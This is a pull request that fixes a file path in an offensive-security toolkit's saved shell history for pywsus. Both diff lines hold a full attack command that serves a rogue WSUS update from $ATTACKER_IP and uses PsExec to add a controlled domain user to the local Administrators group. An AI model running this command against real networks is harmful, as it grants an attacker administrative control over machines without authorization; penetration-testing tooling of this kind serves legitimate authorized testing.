### PR TITLE
Fix pywsus history command

### DIFF
--- a/sources/zsh/history.d/pywsus
+++ b/sources/zsh/history.d/pywsus
@@ -1,1 +1,1 @@
-pywsus.py --host "$ATTACKER_IP" --port 8530 --executable /opt/resources/windows/sysinternals/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"'
+pywsus.py --host "$ATTACKER_IP" --port 8530 --executable /opt/resources/windows/SysinternalsSuite/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"'


### PR DESCRIPTION
# Description

The Sysinternals folder has been has been moved from /opt/resources/windows/sysinternals/ to /opt/resources/windows/SysinternalsSuite/.
This commit reflects this change in the history file of the pywsus tool.
